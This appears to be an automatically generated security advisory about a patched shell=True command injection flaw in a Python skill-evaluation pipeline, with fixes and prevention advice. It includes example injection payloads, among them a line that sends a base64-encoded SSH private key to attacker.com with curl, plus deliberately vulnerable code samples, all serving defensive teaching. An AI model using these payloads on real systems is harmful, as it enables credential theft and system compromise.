Command Injection via shell=True: How One Flag Opens the Door to OS Takeover
Vulnerability: CWE-78 — OS Command Injection
Severity: 🔴 Critical
Affected Files: `run_eval.py`, `improve_description.py`, `generate_review.py`
Status: ✅ Patched
Introduction
There's a deceptively innocent-looking parameter in Python's subprocess module that has been responsible for countless critical security vulnerabilities: shell=True. When combined with user-supplied input, this single flag can transform a routine script execution into a full operating system takeover.
This post breaks down a recently patched critical vulnerability found in the skill-creator pipeline — a real-world example of how shell=True and unsanitized input create a perfect storm for command injection attacks. Whether you're a seasoned backend engineer or a developer just getting started with Python scripting, understanding this class of vulnerability is non-negotiable in today's threat landscape.
The Vulnerability Explained
What Is Command Injection?
OS Command Injection (CWE-78) occurs when an application passes user-controlled data to a system shell without proper sanitization. The shell — whether bash, sh, cmd.exe, or others — interprets special characters as control operators, not as literal data. This means an attacker can "break out" of the intended command and inject their own.
In Python, the danger zone looks like this:
```python
# ❌ VULNERABLE: shell=True with user input
import subprocess

user_input = request.args.get("skill_name")
subprocess.Popen(f"run_eval --skill {user_input}", shell=True)
```
When shell=True is set, Python hands the entire string to the operating system shell for interpretation. The shell doesn't know or care which parts were "intended" by the developer — it processes everything according to its own syntax rules.
How Does the Shell Interpret Special Characters?
The OS shell recognizes a variety of characters as command operators:
| Character | Shell Meaning | Example Attack |
|---|---|---|
| `;` | Command separator | `skill; rm -rf /` |
| `\|` | Pipe output to next command | `skill \| curl attacker.com` |
| `&&` | Run next if previous succeeds | `skill && cat /etc/passwd` |
| `\|\|` | Run next if previous fails | `skill \|\| whoami` |
| `` ` `` | Command substitution | ``skill`id` `` |
| `$()` | Command substitution | `skill$(cat ~/.ssh/id_rsa)` |
| `>` | Redirect output | `skill > /tmp/backdoor.sh` |
The Vulnerable Code Pattern
In the skill-creator pipeline, three scripts were identified as invoking subprocess.Popen or subprocess.run with shell=True while incorporating user-supplied CLI arguments directly into the command string:
```python
# ❌ VULNERABLE pattern (simplified illustration)
import subprocess
import sys

skill_path = sys.argv[1]  # User-controlled input from CLI argument

# The entire string is passed to the shell — shell=True is the culprit
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE
)
```
This pattern appeared across:
- resources/skills/skill-creator/scripts/run_eval.py (line 85)
- resources/skills/skill-creator/scripts/improve_description.py
- resources/skills/skill-creator/eval-viewer/generate_review.py
A Concrete Attack Scenario
Let's make this tangible. Imagine a developer runs the skill evaluation pipeline and the skill_path argument is sourced from an external input — a config file, an API response, a web form, or even a crafted filename:
Normal input:

```
/home/user/skills/my_skill
```

Malicious input:

```
/home/user/skills/my_skill; curl -s https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) &
```
The shell now executes two commands:
1. `python evaluate.py --input /home/user/skills/my_skill` ← intended
2. `curl -s https://attacker.com/exfil?data=<base64-encoded SSH private key>` ← injected
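You can reproduce the split harmlessly. This sketch substitutes `echo` for the real `evaluate.py` invocation and an `echo INJECTED` marker for the attacker's `curl` (both are illustrative stand-ins; POSIX shell assumed):

```python
# Harmless reproduction of the attack: the caller intends to pass one path
# argument, but the shell executes the text after ";" as a second command.
import subprocess

skill_path = "/home/user/skills/my_skill; echo INJECTED"

proc = subprocess.run(
    f"echo evaluating {skill_path}",  # stand-in for the vulnerable f-string
    shell=True,
    capture_output=True,
    text=True,
)
print(proc.stdout)
```

The output contains a line produced by the injected command, even though the caller only ever "passed a path".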
In a CI/CD pipeline or automated evaluation environment, this could lead to:
- 🔑 Credential theft — SSH keys, API tokens, environment variables
- 🗂️ Data exfiltration — source code, model weights, proprietary datasets
- 🚪 Backdoor installation — persistent access via reverse shells
- 💣 Destructive actions — file deletion, service disruption
- 🌐 Lateral movement — pivoting to other systems on the network
The impact is classified as Critical because successful exploitation grants the attacker the same OS-level privileges as the process running the script — with no authentication required beyond the ability to influence the input.
The Fix
The Core Principle: Never Use shell=True with User Input
The fix involves two complementary changes:
1. Remove `shell=True` — pass commands as a list instead of a string
2. Validate and sanitize inputs — never trust external data
Before vs. After
❌ Before (Vulnerable):

```python
import subprocess
import sys

skill_path = sys.argv[1]

# shell=True interprets the entire string through the OS shell
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)
```
✅ After (Fixed):

```python
import subprocess
import sys
import os

skill_path = sys.argv[1]

# Validate the input before use
if not os.path.exists(skill_path):
    raise ValueError(f"Invalid skill path: {skill_path}")

# Pass as a list — no shell interpretation, no injection possible
result = subprocess.Popen(
    ["python", "evaluate.py", "--input", skill_path],
    shell=False,  # explicit is better than implicit
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)
```
Why Does the List Form Prevent Injection?
When you pass a list to subprocess.Popen (without shell=True), Python uses execvp (on Unix) or CreateProcess (on Windows) to launch the process directly. Each list element becomes a discrete argument — the OS never invokes a shell to interpret the string.
This means special characters like ;, |, and $() are passed literally to the target program as part of an argument value. They have no special meaning. The attack surface disappears entirely.
```python
# These are equivalent in intent, but VERY different in security:

# ❌ Shell interprets the string — injection possible
subprocess.run(f"echo {user_input}", shell=True)

# ✅ OS passes arguments directly — injection impossible
subprocess.run(["echo", user_input], shell=False)
```
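To see the difference concretely, here is a small runnable sketch (the payload is an illustrative stand-in) showing that in the list form the `;` metacharacter is just another byte of the argument:

```python
# With the list form there is no shell in the loop: ";" has no special
# meaning, so the would-be injected command never runs.
import subprocess

payload = "hello; echo INJECTED"

result = subprocess.run(["echo", payload], capture_output=True, text=True)
print(result.stdout)
```

This prints the entire payload as one literal line — `hello; echo INJECTED` — rather than executing anything after the semicolon.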
When shell=True Is Genuinely Needed
Occasionally, shell features like glob expansion (*.txt), shell built-ins (cd, export), or pipe chaining are legitimately required. In those cases:
```python
import shlex
import subprocess

# shlex.quote() wraps the value in single quotes and escapes internal quotes
safe_input = shlex.quote(user_input)
subprocess.run(f"some_command {safe_input}", shell=True)
However, shlex.quote() should be considered a last resort, not a first line of defense. Eliminating shell=True is always the preferred approach.
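To illustrate what `shlex.quote()` actually does, here is a small sketch (the payload and `echo` command are illustrative; POSIX shell assumed): the quoted value is wrapped in single quotes, so the shell treats the `;` as literal text.

```python
# shlex.quote() neutralizes shell metacharacters by single-quoting the value.
import shlex
import subprocess

malicious = "my_skill; echo INJECTED"
safe = shlex.quote(malicious)
print(safe)  # -> 'my_skill; echo INJECTED' (wrapped in single quotes)

result = subprocess.run(
    f"echo {safe}",
    shell=True,
    capture_output=True,
    text=True,
)
print(result.stdout)
```

The second print shows the whole payload echoed as one literal string; the injected `echo INJECTED` never runs as a command.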
Prevention & Best Practices
1. Default to List-Form Subprocess Calls
Make it a team convention: subprocess calls always use list arguments unless there's a documented, reviewed reason to do otherwise.
```python
# Establish this as your team's standard pattern
subprocess.run(["command", "arg1", "arg2", user_input], check=True)
```
2. Validate Inputs Before Processing
Apply allowlist validation to any input that will be used in a subprocess call:
```python
import re
import os

def validate_skill_path(path: str) -> str:
    """Validate that a skill path is safe to use."""
    # Allowlist: only alphanumerics, hyphens, underscores, slashes, dots
    if not re.match(r'^[a-zA-Z0-9/_\-\.]+$', path):
        raise ValueError(f"Skill path contains invalid characters: {path}")

    # Ensure the path resolves to a location inside the expected directory.
    # Compare with os.path.commonpath rather than a raw startswith check,
    # so a sibling directory like /app/skills-evil is not accepted.
    abs_path = os.path.realpath(path)
    allowed_base = os.path.realpath("/app/skills")
    if os.path.commonpath([abs_path, allowed_base]) != allowed_base:
        raise ValueError("Path traversal detected")

    return abs_path
```
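The containment check deserves particular care: a naive string-prefix comparison would accept a sibling directory such as `/app/skills-evil` because it starts with `/app/skills`. A compact sketch of a safer check using `pathlib.Path.is_relative_to` (available in Python 3.9+; POSIX paths and the `/app/skills` base directory are assumptions for illustration):

```python
# Containment check that resolves symlinks and ".." before comparing,
# and is not fooled by sibling directories with a shared name prefix.
import os
from pathlib import Path

def is_within(base: str, candidate: str) -> bool:
    resolved = Path(os.path.realpath(candidate))
    return resolved.is_relative_to(os.path.realpath(base))

print(is_within("/app/skills", "/app/skills/my_skill"))       # True
print(is_within("/app/skills", "/app/skills/../etc/passwd"))  # False
print(is_within("/app/skills", "/app/skills-evil/payload"))   # False
```

The `..` traversal and the look-alike sibling directory are both rejected, while genuine children of the base directory pass.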
3. Apply the Principle of Least Privilege
Run scripts with the minimum permissions required. A command injection in a low-privilege process is far less damaging than one running as root or with broad cloud IAM permissions.
```bash
# Run evaluation scripts as a dedicated, restricted user
sudo -u skill-evaluator python run_eval.py --input "$SKILL_PATH"
```
4. Use Static Analysis Tools
Integrate security scanners into your CI/CD pipeline to catch these patterns automatically:
- Bandit — Python-specific security linter; flags risky subprocess usage, including `shell=True` (rules B602, B603)
- Semgrep — Highly customizable static analysis with rules for subprocess injection
- CodeQL — GitHub's semantic code analysis engine
- Safety — Checks Python dependencies for known vulnerabilities
```yaml
# Example: Bandit in GitHub Actions
- name: Run Bandit Security Scan
  run: |
    pip install bandit
    bandit -r . -ll --skip B101 -f json -o bandit-report.json
```
5. Code Review Checklist
Add these questions to your security-focused code review checklist:
- [ ] Does this code call `subprocess` with `shell=True`?
- [ ] Does any subprocess argument originate from user input, environment variables, or external data sources?
- [ ] Is input validated against an allowlist before use?
- [ ] Does the process run with the minimum required privileges?
6. Relevant Security Standards
This vulnerability maps to well-established security standards:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- OWASP A03:2021: Injection (consistently in the OWASP Top 10)
- OWASP Testing Guide: WSTG-INPV-12 — Testing for Command Injection
- NIST SP 800-53: SI-10 — Information Input Validation
Conclusion
The shell=True vulnerability pattern is a textbook example of how a single, seemingly convenient parameter can introduce catastrophic security risk. The fix is straightforward — switch from string-based to list-based subprocess calls — but the lesson runs deeper: never trust user input, and always understand the security implications of the APIs you use.
Key takeaways from this vulnerability:
- `shell=True` + user input = command injection. This is one of the most reliable rules in application security.
- The fix is simple but the impact of not fixing it is severe — Critical-severity vulnerabilities like this can lead to full system compromise.
- Defense in depth matters — Input validation, least privilege, and static analysis together create multiple layers of protection.
- Automated scanning catches what code review misses — Integrate tools like Bandit and Semgrep into your pipeline before code ships.
Security vulnerabilities like this one are rarely the result of malicious intent — they're the product of convenience, time pressure, and incomplete understanding of a platform's security model. The best defense is education, tooling, and a culture that treats security as a first-class concern alongside functionality and performance.
Write safe code. Review with security in mind. And when in doubt, check the docs for the security implications of every parameter you set.
This post was generated as part of an automated security fix workflow by OrbisAI Security. The vulnerability was identified by multi-agent AI scanning, patched, and verified through re-scan and LLM code review.
Have a vulnerability you'd like explained? Security education is the first line of defense.